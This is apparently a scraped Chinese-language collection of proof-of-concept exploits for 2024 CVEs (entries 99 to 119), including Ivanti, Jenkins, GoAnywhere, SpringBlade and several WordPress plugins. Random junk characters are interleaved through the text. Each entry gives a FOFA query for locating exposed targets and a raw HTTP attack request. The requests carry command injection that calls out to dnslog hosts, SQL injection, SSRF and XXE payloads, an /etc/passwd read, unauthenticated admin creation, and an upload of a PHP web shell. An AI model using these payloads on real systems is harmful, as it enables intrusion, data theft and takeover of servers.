Content-Length: 121# v5 ^ A& a9 x, w0 C% z0 q% {
Accept: */*
( V! o+ T9 q( y8 I2 w7 HAccept-Encoding: gzip, deflate9 U$ A& Q- c: J8 Z" x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 n5 s' c \6 L' Y, XContent-Type: application/x-www-form-urlencoded; charset=UTF-89 m+ u0 s ~8 [' [' P
X-Requested-With: XMLHttpRequest n0 N' {0 H! ?. I$ @
$ a! T% I& M4 |1 w3 k+ n2 ]id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B" Q, [$ S$ C$ `2 F7 l1 [* I4 e
6 D% P2 {, }" `2 O: S; n6 R9 B# y! W0 l8 p& a
99. Ncast盈可视高清智能录播系统busiFacade RCE
& M6 B! i, ^- u! j: s- KCVE-2024-0305$ g7 o# s+ \$ I. W7 e
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
$ |0 @' @) m+ U! m6 zPOST /classes/common/busiFacade.php HTTP/1.1& K' y$ ?) @/ R9 U6 j/ g
Host: 192.168.40.130:8080
7 X4 m& n: \1 b. Q3 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& L/ l) T, j& {& x0 ?' h. D. h
Connection: close
+ |# T" ~4 A5 s0 U) R. y wContent-Length: 154
* e# r4 n3 W' @* l3 ^Accept: */*
0 h- _% a" H- v% o4 hAccept-Encoding: gzip, deflate }- E5 b$ Z1 C( ~: n; K& C) T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' x7 T6 Z$ H* i5 n3 _7 P/ D
Content-Type: application/x-www-form-urlencoded; charset=UTF-8, Q0 x( ^6 R, h* h3 R; \/ l
X-Requested-With: XMLHttpRequest3 t0 l4 q1 t. J% l: L6 R
4 Q3 n/ v/ f7 B2 X9 o; p6 j
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D7 {4 X, E" a( @5 l' \- [
. [ @7 ^: H2 d( G) K! n
, y( x. S# @ F100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
6 S6 ?8 @0 q) L5 ] UCVE-2024-0352) Y3 L H5 G( B6 N- E% e, H
FOFA:icon_hash="874152924"
$ ?4 }; M" t2 w/ U4 L0 @POST /api/file/formimage HTTP/1.1
) U9 n0 B3 L" @# VHost: 192.168.40.130
" R+ {6 V$ W( o- n, p2 S9 O% _: uUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.365 Y1 }6 [; [0 L m0 j, g, P
Connection: close! W9 S) |( [5 [) s$ `
Content-Length: 201
! _: e/ D, Y! ^4 n% Y, kContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei7 O# e6 x/ B6 V( m0 s9 P
Accept-Encoding: gzip; i% Q0 o- S; _
, ]7 q; c2 I. ?1 [. a------WebKitFormBoundarygcflwtei3 O5 N% m6 ^ u7 h
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
1 O; M2 h s) a; lContent-Type: application/x-php
* g; `* f0 W6 e) t+ n1 ~9 Q; z" z$ ~3 K& u
2ayyhRXiAsKXL8olvF5s4qqyI2O
& G. P& `1 I7 Q7 L4 ?3 }# \8 T* a------WebKitFormBoundarygcflwtei--
3 T0 c9 D ~, \ w9 X2 l7 r3 c; Y$ ~' g' `/ b0 ]
2 s5 X/ R) r7 h' A1 D8 ?, a) b( r
101. ivanti policy secure-22.6命令注入
( s. p% e1 D( V1 @- _CVE-2024-21887
7 M- f1 i2 P+ S* B7 Q: WFOFA:body="welcome.cgi?p=logo"
! |" x: {" b' J8 p' {2 QGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
) d) i/ Y) S t" W- R5 CHost: x.x.x.xx.x.x.x/ y+ c: D- V+ N& P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. W( V+ [1 e B6 |% \& Z" z kConnection: close( D$ [9 Y& c5 `4 d5 g- J& G/ X
Accept-Encoding: gzip" [- s2 w1 r0 q T
9 @9 o2 r7 G- g/ D8 _& w) p8 A
, r7 h6 J5 z* E, N0 l102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行; o* u) h% ]8 y7 z) Q: m
CVE-2024-21893
6 \' R1 e* d! Z& f: x% CFOFA:body="welcome.cgi?p=logo"7 m7 _( S1 g' ~; f
POST /dana-ws/saml20.ws HTTP/1.1+ G) P7 A0 S7 i1 U# j
Host: x.x.x.x
# k/ Q! N7 o1 }; nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 m( B1 Y, r S1 {
Connection: close. {. t& q8 R k1 L
Content-Length: 7922 h k: J& R1 ^" |' V
Accept-Encoding: gzip4 p7 {# ~- d- w: w
3 U/ M1 Y" @$ S) J9 O: q
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>/ F8 l( z: X6 l2 w+ ]: w b
& r" a. A, ?* d% Y103. Ivanti Pulse Connect Secure VPN XXE" ~) a& R/ ?, ?/ G0 R2 }
CVE-2024-22024
. n$ U0 y- U+ C7 FFOFA:body="welcome.cgi?p=logo"
& { N# d" m+ U) K% v# Y+ jPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
- ?( P0 A- f0 s/ j/ Z) dHost: 192.168.40.130:111
" D5 H+ E' `. \5 ]7 `9 U6 DUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.360 W) c0 B6 b: r! a
Connection: close# j5 [, I: g% E2 g3 w- _
Content-Length: 204: n; A* i% ^, w- X$ I# h
Content-Type: application/x-www-form-urlencoded
4 A" o, {3 w: F7 [8 BAccept-Encoding: gzip) M6 `7 L6 L3 m+ L5 ]
3 ?3 e- ^7 `* D' H- m
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
& S2 D/ n9 Y8 e4 L% A
1 C8 W F1 t, e5 D, w9 O3 t
5 W; N! P8 ?9 Q0 [$ L其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
: W) Q: B6 |1 x, I) x<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>% _* _) j6 T! F: }# C0 M: l
1 |; e( y: Y! d" q* J& p H3 }3 \- l! t/ k7 T% Z$ }# c' r
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
: G+ x/ }9 h+ @7 jCVE-2024-0569, a6 @' N: n+ d1 K
FOFA:title="TOTOLINK"
5 w& A+ V2 \ o( D5 f5 X; IPOST /cgi-bin/cstecgi.cgi HTTP/1.1
1 {# j2 M' K) P- b' R- v O$ }Host:192.168.0.1
+ N( |1 ~# ~0 j" G* U1 BContent-Length:413 g, ~, Q- O' L
Accept:application/json,text/javascript,*/*;q=0.012 d" w+ L3 A3 F7 m* a7 Z
X-Requested-with: XMLHttpRequest
0 G$ ?3 A. ]9 g2 o& I! Y" l/ w0 [. ?, |User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
$ ]9 d) r2 o3 ]$ \9 V1 AContent-Type: application/x-www-form-urlencoded:charset=UTF-83 n3 {. R) N% [$ N5 @ v/ ~. s
Origin: http://192.168.0.1& C1 N; n1 K1 d& R$ v
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
2 j3 A6 n8 q4 n" f- S6 IAccept-Encoding:gzip,deflate0 [7 s! @# v$ E+ V" g: |( N
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7! t8 z% u. N. N/ u
Connection:close/ G2 j. y( d% q
( w _9 R' ~: y, ~% i6 E0 l% A
{: I2 ~8 }+ x% W, i, [) }; e$ n8 P
"topicurl":"getSysStatusCfg", m9 ^, G8 c2 A2 v3 i5 N) M" W" O
"token":""% c. I2 F7 h u1 ^, W
}: ~5 F: _" K, ?, o1 a+ c. D" z1 z
8 ?& }2 X# W0 k! s9 r105. SpringBlade v3.2.0 export-user SQL 注入
- B( A7 w- ?6 x0 l# [" [, sFOFA:body="https://bladex.vip"- x3 j' l5 ?9 N# H5 X
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1# |/ D" T" D& H
+ ^# Y4 s& q) G/ J$ W! R
106. SpringBlade dict-biz/list SQL 注入/ g" m3 [0 q$ P7 N4 t( t
FOFA:body="Saber 将不能正常工作"
' X" m, N& T, V3 fGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
5 e9 |& b! t+ B$ {# {$ d pHost: your-ip" v/ ?0 ]9 l$ p$ H/ j! X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 _) U8 \2 y2 \- v' LBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
0 S3 \3 ^ W. N" H1 XAccept-Encoding: gzip, deflate6 C1 }7 {" L# \6 d
Accept-Language: zh-CN,zh;q=0.9' a2 \1 _% g/ r$ A. h/ h, ^/ }! h
Connection: close- }; s0 r) k- J4 m8 i
' m8 }' ^$ n1 s5 x+ U4 Q; B9 s" Y1 V8 o* q' C3 B* M! U
107. SpringBlade tenant/list SQL 注入1 l8 w% @" l! w! g2 [% y
FOFA:body="https://bladex.vip"
/ r# m, n6 R) o" ]GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
. x9 e9 F F$ o1 PHost: your-ip
! r: U Y" T' b6 J7 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* w4 ~& H7 i/ c, F ]3 D; Z
Blade-Auth:替换为自己的1 i3 K1 G+ l2 o
Connection: close
' s5 @" G ~2 h1 d0 C4 T4 }
6 k4 X- d6 W' k" W* P- z3 r& ]4 N: \; [, `
108. D-Tale 3.9.0 SSRF
) z; Q: R+ v) ~8 k+ S- R$ \5 ]CVE-2024-216427 k( h+ n, X: ~
FOFA:"dtale/static/images/favicon.png"
. M# J, W, s/ }- S, zGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1+ E1 }; j8 e2 A
Host: your-ip1 Y1 n1 ^) k9 F1 d- `8 e4 a) j8 ]$ d
Accept: application/json, text/plain, */*
& W" {" X* ]6 |3 G! i8 G, w5 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 ~8 k/ q& ~. `& D3 jAccept-Encoding: gzip, deflate9 H+ \+ Z2 M9 A9 I. F
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8! I6 `% n/ |/ o( m' k0 i% [9 P
Connection: close- a }9 ~9 I8 c& v# U/ J& l
1 o8 U# t) S8 q6 r" t
. r( A" P6 k0 k; P5 P4 o109. Jenkins CLI 任意文件读取
0 `$ u- Q( U+ H( A$ s5 |; g. vCVE-2024-23897
6 Y( O2 g) p+ H, ~- ?6 f# M. }FOFA:header="X-Jenkins"
* H3 Y6 G, B( t2 H# qPOST /cli?remoting=false HTTP/1.1
( g) J) g: ^: I# \' R! w- KHost:8 ~0 W# \! P/ E) g, S: ~
Content-type: application/octet-stream6 v% G: R5 D# o2 v. H l( o9 M7 }
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
0 I9 e) P% V# U1 ZSide: upload
; f( O# a1 t& G! ~. E/ AConnection: keep-alive
+ N+ _$ Z6 V, m- S' O- u: p' l; L5 GContent-Length: 163
8 e; k+ |' R! a i! F) e2 h
0 E& ?: ?3 p6 O5 i1 kb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
- V' [3 ~, @: z; s) A1 Z7 J7 F* W C& l# L8 }' n4 J: h
; w$ v6 Y. e/ t+ PPOST /cli?remoting=false HTTP/1.1
7 h3 q' v7 U1 A$ u5 DHost:
9 P0 q3 |8 z& o; V; g. V6 |+ M! `Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92/ O. @ \0 k6 A) E% T: E
download. ]& n: p5 ^5 C) b ^4 w i
Content-Type: application/x-www-form-urlencoded" b# l' X+ M3 Y- Q1 n$ ]% T2 |
Content-Length: 0
$ e% ^; M' d8 ^, C
m0 `4 A& e7 C% e" V9 U
% N5 q; J. J5 B- HERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
) `- j; r( x: K7 y# ajava -jar jenkins-cli.jar help* n. Z9 r2 Y0 K0 f- V3 m
[COMMAND]
; z! s. w* t7 y7 I; W; X/ LLists all the available commands or a detailed description of single command.
' O* [, W7 u; h# ?2 v/ s6 m COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)6 K( J. g5 A2 a9 C+ O( h
5 y: x% {' J! }( E+ s6 P& C" x
: J% a, j" G. r1 I- H8 |
110. Goanywhere MFT 未授权创建管理员
+ s8 m6 [: b! q l$ YCVE-2024-0204
* G. X9 i( x Y, K, m1 A; vFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"! w( j7 f$ C3 g& _0 o
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
& o7 \. H; e1 F, K7 A6 [Host: 192.168.40.130:8000$ e" e) r+ G5 @( A
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
" N; A u! _4 f$ k$ B, dConnection: close
& t5 p, C$ d6 R- E& r& S) w, M6 _Accept: */*
7 [( U+ ~, E7 U3 vAccept-Language: en7 A" i) D7 Z' f9 u8 G, i* f; c
Accept-Encoding: gzip
3 W5 }+ p9 z. D0 w9 e' K3 `
8 [& i1 G9 k5 U' o" `' k, H" A8 z8 C5 W
111. WordPress Plugin HTML5 Video Player SQL注入
; ?2 j/ _. K) HCVE-2024-1061, F1 N9 O. ^( ]2 [
FOFA:"wordpress" && body="html5-video-player"6 D9 D. e8 S) X1 M9 F" ?$ a/ } [# ?
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.19 s) l( E$ {% d$ D' A- Y& A% M' A
Host: 192.168.40.130:112
% Z9 |" p0 r; d. d. w+ y6 lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
% j. X( S% e! I5 A! \% n' x- h% ~+ d! IConnection: close& V v# f# g; m( e
Accept: */*6 a$ s5 w1 C7 Y/ I! E
Accept-Language: en
' D2 h1 M. F9 n$ e- \1 cAccept-Encoding: gzip
6 ?, j8 L( V; ?9 q+ ]) \1 M0 ^' }0 b; d
7 {4 {) E) S& B0 X9 a, k112. WordPress Plugin NotificationX SQL 注入
2 F% d6 }% |9 l- n1 YCVE-2024-1698
/ r, A7 [) C6 ~2 pFOFA:body="/wp-content/plugins/notificationx"
5 I. ~" X7 C0 L* W l. F4 H8 dPOST /wp-json/notificationx/v1/analytics HTTP/1.1
1 h7 C7 a5 _ L9 F1 ^- D bHost: {{Hostname}}1 C1 j8 a- ~4 x9 i; ^, T. \
Content-Type: application/json8 F8 z/ e# X% f0 V: v" F
& }( T% s" i* s, s$ c- {{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}! M* Y' v. I7 `8 I
. }8 |/ V3 ^2 K% d9 D
) B6 I6 s3 D4 R3 g, w1 j2 S! s, ]113. WordPress Automatic 插件任意文件下载和SSRF
/ R# q8 W$ @- [3 @" T4 wCVE-2024-27954
& i/ T- Q8 B" V! U/ FFOFA:"/wp-content/plugins/wp-automatic"0 ], h! I* u9 S5 }* F- X# d
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
; e5 g$ m# o0 K+ A& w1 BHost: x.x.x.x
/ p3 ?* f5 x: dUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36) R; T, _* i+ v0 [
Connection: close G0 w( t% \4 ?1 i& n0 i7 `: N7 e2 k
Accept: */*2 Q, b; c% \$ Y& q: z" Q
Accept-Language: en: \, ^1 O9 }( b1 W& s) W P; C6 D
Accept-Encoding: gzip
1 Q3 i# r ^; g% |, n* n& B4 Q; i( F6 D" E# L6 i
' S2 n, `0 N9 `& p; x% Z- x114. WordPress MasterStudy LMS插件 SQL注入
. {. {9 F6 B1 p1 L" t$ f/ mFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/", l" t5 F# Y; W9 U
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1# J, D2 ^5 _: J
Host: your-ip
3 e1 I& z4 i7 J- [ t+ y( s" }User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
6 r. I* h3 S R* ~0 q* DAccept-Charset: utf-8% s% M9 ~+ K$ \: }; }# Y' b G6 m
Accept-Encoding: gzip, deflate
* p) k6 q& v: t& K2 n+ T$ _) d: fConnection: close
& }# v6 u- i* y* @2 I0 v$ c* k# p, _$ W
; a) P" ?0 ~/ l
115. WordPress Bricks Builder <= 1.9.6 RCE) Z l( q9 Y) c9 b, @9 J
CVE-2024-25600
f: h; v; W4 G9 F# EFOFA: body="/wp-content/themes/bricks/"
% L4 B9 R8 B/ V# g. t& D& ^! q第一步,获取网站的nonce值% G+ y+ `' V9 {1 C* L9 p
GET / HTTP/1.1$ ^% q% Q: Q8 m( l6 H
Host: x.x.x.x- z, O8 \. M; n1 z+ I+ B9 x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
! G7 S2 F5 h3 S4 \# k2 yConnection: close
1 t8 Q' k0 D, T5 ?8 d' ?" ^- HAccept-Encoding: gzip
8 C# ?5 H9 Z: E) \8 }2 @! v! q" H$ w" r j4 M2 j" ?1 A
* o4 _6 ?2 m: x第二步替换nonce值,执行命令, [$ u1 B# f u2 z3 X2 b' p) w1 t
POST /wp-json/bricks/v1/render_element HTTP/1.1% \9 W; D* I7 R3 S$ L
Host: x.x.x.x
9 P" l/ k. x# f# c! SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% j3 K: p+ d5 }2 @0 \# v7 d6 j+ ~; DConnection: close
! b* M5 {) u2 N. _% FContent-Length: 3568 w p: K. b: B( L- B) n
Content-Type: application/json0 |) H& w$ S; Q! ?# Y. \+ _0 p
Accept-Encoding: gzip# k- n8 ~7 _/ \; Q% J! a& \4 @
0 Y! |' G/ q) E- T9 D( z' y
{
( }9 W4 I& ^4 ^& q b; n' a m"postId": "1",
+ }1 }: C6 K# E- A$ N# u( B "nonce": "第一步获得的值",
9 O) S: M$ Q3 r4 _ g3 a+ J1 b "element": {
* X+ Q: C. Q6 F "name": "container",' j" s- c& w' [
"settings": {
+ ? K' W& ~' {% H "hasLoop": "true"," ~3 p! o1 n! @3 a, D1 p4 z
"query": {6 y p: g& ]8 J: }* I
"useQueryEditor": true,# h0 o+ D/ _9 c* ^4 f; v* w$ c$ ]
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",. ^8 l& s" X) e, {! [) a; e5 X
"objectType": "post"+ `( t3 n0 T8 `4 X; k9 U; W
}% ]9 |+ n* V" D7 e5 t2 J
}1 p* m+ R2 f+ p2 O
}
9 f! o/ Y& [- `}
' q" e: D8 J* ?1 ^9 K0 ~
) |" T, P: m* n/ @# z5 j* U! I) P4 s- r# N; A
116. wordpress js-support-ticket文件上传7 B9 c8 V7 Q! l! a
FOFA:body="wp-content/plugins/js-support-ticket". t* y- ]2 V3 e% l2 K( Z
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.11 q- v3 Y5 U& v6 H3 w8 L
Host:
: A' Y0 r4 {9 |4 C2 |3 z" [Content-Type: multipart/form-data; boundary=--------767099171" W) G6 d& `( Z7 X% M
User-Agent: Mozilla/5.0
( v0 V; }* m0 ]# u3 o& z: ^9 T& B* \( T( ~* G( L7 {7 h4 D
----------767099171
/ _. d& p' e. KContent-Disposition: form-data; name="action"5 D6 ^- [6 U2 u* E
configuration_saveconfiguration
8 R: R" T! {# }& y5 Z3 l( H----------767099171" L4 P1 v% s6 R& D+ L* f
Content-Disposition: form-data; name="form_request"8 T: o1 V* W8 R
jssupportticket& l7 _. v4 e- W7 q
----------767099171
4 ]- @) ]7 h9 i g0 \ x, Y7 hContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php" F% J) l2 x% A2 |/ i2 }& Y
Content-Type: image/png
2 K9 N3 t# y4 R6 o8 t+ q----------767099171--4 c3 O; f' Q: y0 W; `! W7 b8 x
- P' h" C. f& x
6 P! q* [/ y$ O6 K117. WordPress LayerSlider插件SQL注入
% }6 F3 Q" y3 a$ c: P1 U" Xversion:7.9.11 – 7.10.07 h; Z! l$ K9 e% e9 i
FOFA:body="/wp-content/plugins/LayerSlider/"* \: O, ~/ l# k% o# o
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
* C2 z& G8 y& ~% R: [+ {Host: your-ip" c& T. }( x6 C4 U2 P2 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.02 Y( @) l% s2 R2 V+ p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 v9 I$ I' U# v4 y! j. ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- G/ U. G3 |( S. f f! {Accept-Encoding: gzip, deflate, br
4 h' \! C: u' J, g1 X2 x& l! _Connection: close
! W( A2 P9 L( v6 v BUpgrade-Insecure-Requests: 1( a' k& s+ y) L' V$ n9 z) e: r3 @" Q
d" y$ n F) J) L- C$ y
2 M' y' P$ t9 D- ?/ m8 G9 v2 `+ \118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
, `1 C, Y6 p" D% W' OCVE-2024-09395 M# p6 \! X! [& |/ N+ J
FOFA:title="Smart管理平台"% f* U* t, O. C v/ i
POST /Tool/uploadfile.php? HTTP/1.1. Y2 X5 _8 D. o* o6 p) Y
Host: 192.168.40.130:8443
. Q2 ]) d6 _; t2 l2 FCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
! w b; l" c% x/ T. Q$ o9 ~+ MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
9 ~( `7 g4 \" s: Y9 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( e: |9 I h# A; z6 |4 P( ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 w; h, D: o9 ` k- WAccept-Encoding: gzip, deflate/ t2 v. l% Q/ N n% f; j
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887# Q: a, ^. O- O9 n G/ d
Content-Length: 405
. d1 Q8 Z; I9 Q# }- G. ^Origin: https://192.168.40.130:84438 E. Z* i( E, U& o
Referer: https://192.168.40.130:8443/Tool/uploadfile.php; r' J u" W, i& ^3 ~/ S/ W$ h
Upgrade-Insecure-Requests: 1& o3 D3 f4 n5 \& q# Y
Sec-Fetch-Dest: document
9 u' B3 \5 L0 KSec-Fetch-Mode: navigate9 `" l' Y5 a7 K# O; q9 A
Sec-Fetch-Site: same-origin
8 y7 n3 ?; F% {9 rSec-Fetch-User: ?1- E% h0 `- H1 K1 E) K0 n3 z
Te: trailers
5 F8 q2 A9 M5 F4 c. K- aConnection: close
. P5 k+ U6 D- _, H2 T! x9 o
# J9 D9 h0 k* [+ h; E/ ~% s/ C" L( o-----------------------------139797012227476466340371828871 k& B4 K7 d7 U/ z5 V. R
Content-Disposition: form-data; name="file_upload"; filename="contents.php"* y7 S8 u9 j& O0 V9 C
Content-Type: application/octet-stream0 l( H, L; j8 X9 R
9 ^/ F/ O6 K! B i<?php
! H9 S+ v, z6 n& Gsystem($_POST["passwd"]);
+ G5 U* M4 M9 d) j7 L# H?>
7 R- v2 J% t3 t( F" t" a0 n! z-----------------------------13979701222747646634037182887
# m& j& b& v! g7 z7 }+ F, n9 GContent-Disposition: form-data; name="txt_path"
/ n+ T" I: {3 n9 `5 l! k( Q+ a8 R. C J: n T
/home/src.php
3 r: u( B" c4 [; ^8 q-----------------------------13979701222747646634037182887--7 m6 P( P$ L& Y0 w6 K- a9 p
' A) S8 F# M7 Y: v2 `
. J9 X$ y; ?' h$ O- q( F8 d$ g访问/home/src.php
1 ^! Z: O4 C- r3 U7 H5 m! F5 a
" d, Z! X: k7 o# ~, [119. 北京百绰智能S20后台sysmanageajax.php sql注入
5 m! a- N+ v, {2 p' gCVE-2024-1254
' H* e Q( {0 J& E0 ^( a5 PFOFA:title="Smart管理平台"3 r! e0 X8 h* i) i/ r: Q' M" q
先登录进入系统,默认账号密码为admin/admin7 x6 c5 i- {6 F. w( Z# G8 U5 F. Y
POST /sysmanage/sysmanageajax.php HTTP/1.11
$ T; L, v5 e& V" vHost: x.x.x.x: d4 ^1 V( V; `$ T5 Q
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
5 s8 T+ L/ r' P* xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0% Z; _9 l0 S' r% W4 W0 S4 M) g7 \. O# P: C
Accept: */*7 Y4 Z- ?; R7 K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) U. o G, c5 G) M, b2 |Accept-Encoding: gzip, deflate6 ~, f' ?) W, J9 {
Content-Type: application/x-www-form-urlencoded;
y2 Y1 T; k) w4 [- I( s T: XContent-Length: 109; O( h4 g* ~2 J. s5 [
Origin: https://58.18.133.60:8443
) o, F- O4 O* fReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
